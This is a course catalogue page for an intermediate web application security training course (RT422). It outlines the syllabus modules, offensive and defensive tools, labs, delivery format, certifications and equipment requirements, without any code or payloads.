Web Application Security
Intermediate
RT422
Table of Contents
Description
The Web Application security course will help participants understand major web application flaws and their exploitation, as well as learn a proven process for locating these flaws consistently.
This training program’s primary goal is to help security specialists understand web application risks in their organization and learn how to conduct web app security assessments, mitigate the vulnerabilities, and write technical reports.
How to make the most of this course?
In order to succeed in the course, the following requirements must be met:
- Participation in all practical laboratories
- Self-work at home between lessons
- Repetition of materials, self-learning, performing tasks, etc…
In addition to regular classroom studies, the participant is required to practice at least 10 hours a week in order to gain practical experience in the field.
The participant will also need a good personal computer suitable for running virtual machines, with a broadband Internet connection.
Target audience
- Security practitioners
- Penetration testers
- Ethical hackers
- Web application developers
Objectives
- Discovering and mitigating website vulnerabilities
- Using tools to automate your tasks
- Securing web servers from attacks
Pre-requisites
- Basic Web Development
- Basic Cybersecurity knowledge
Syllabus
Description
In this module, participants will learn the concepts of web application security, techniques, and methods used by web app developers.
Technical content
- WebApp Basics
o HTML
Basic Tags Learning to Format
o PHP Basic Syntax Defining Variables
o Combining HTML and PHP
o HTTP Response Codes - WebApp Concepts
o Web Application Architecture Client, Server, and Database Fingerprinting Websites Robots.txt Structure Understanding Entry points
o Authentication vulnerabilities Authentication vs. Authorization Role-Based Access Control Securing the Admin Interface Parameter Tampering SSL vs. TLS HTTPS Encryption
o Session Management Techniques Cookies Long Session Timeout
o File Handling Path Traversal Handling File Size and File Type Insecure File Extension Handling
Description
In this module, participants will learn how to work with web app scanners and reconnaissance tools, review their reports, and understand the data they provide. Also, how to limit sensitive data from leaking.
Technical content
- Scanning
o Vulnerability Scanners
▪ Nikto
▪ Grabber
▪ Zed Attack Proxy
▪ SQLmap
▪ Wfuzz
▪ W3af
▪ Vega
▪ Wapiti
▪ Fierce
o DNS data exfiltration
▪ DIG
▪ DNSRecon
▪ DNSEnum
• Analyzing
o Directory Discovery
▪ Dirbuster
▪ Dirb
o Reconnaissance tools
▪ The Harvester
▪ Whois and Dimitry
▪ Maltego
▪ OSINT Framework
Description
During this module, participants will learn about the most common vulnerabilities in web applications, how they can be exploited, and what impact they could have.
Technical content
- Understanding Code injection
o XML External Entities (XXE)
o Cross-Site Scripting (XSS)
o Finding Exposed Sensitive Data - Abusing Security Misconfiguration
o Broken Authentication
o Bypassing Broken Access Control
o Insecure Deserialization
o Finding Components with Known Vulnerabilities
o Insufficient Logging and Monitoring
Description
During this module, students will learn the basics of conducting tests on web applications to detect security holes either by brute-force or by exploiting a vulnerability.
Technical content
- Attacking Basics
o Burpsuite Fundamentals
o Firewall Detection
▪ Wafw00f
▪ HTTP Headers
o Brute-Forcing Login Pages
▪ Crafting Wordlists using Cupp and Crunch
▪ Using Burpsuite and Hydra
o SQL-Database Attacks
▪ Union-Based
▪ Blind Injection
▪ Burpsuite Automated SQL Attacks
Labs
- Lab 1 HTML and PHP
- Lab 2 Injecting Data
- Lab 3 Using Scanners
- Lab 4 SSL Vulnerabilites
- Lab 5 Hijacking Sessions
- Lab 6 File Handling
- Lab 7 BurpSuit Advanced
- Lab 8 SQL Injections
Course type
This course is delivered in the following ways:
- Virtual classroom with proctored labs and scenarios executed in our Cyberium Arena
- In situe classroom with proctored labs and scenarios executed in our Cyberium Arena
All sessions are recorded and attendees can replay them during 30 days. All course material is electronically made available to the participant.
Course Group: FOUNDATION
Hands-on / Theory MiX
The following course incorporates a high level of hands-on labs exercises, as well as real life case studies.
Certification
This course prepares the participant to the following certification:
- GWEB (SANS)
- OSWE (Offensive Security)
Required EqUIPMENT
Network connection
As this course extensively uses a cloud based Learning Management System, including a lab arena, attendees need a stable broadband connection to the Internet.
BYOD – Bring Your Own Device
As it is a very practical course, and in order for the participants to make the most of the course, they need a laptop with the following capabilities:
- Audio and Video
- 8 GB RAM
- 200 GB Disk Space
- Virtualization capabilities ( supporting latest version of Virtualbox or similar virtual machine application)
And also a Good Headset with Mic
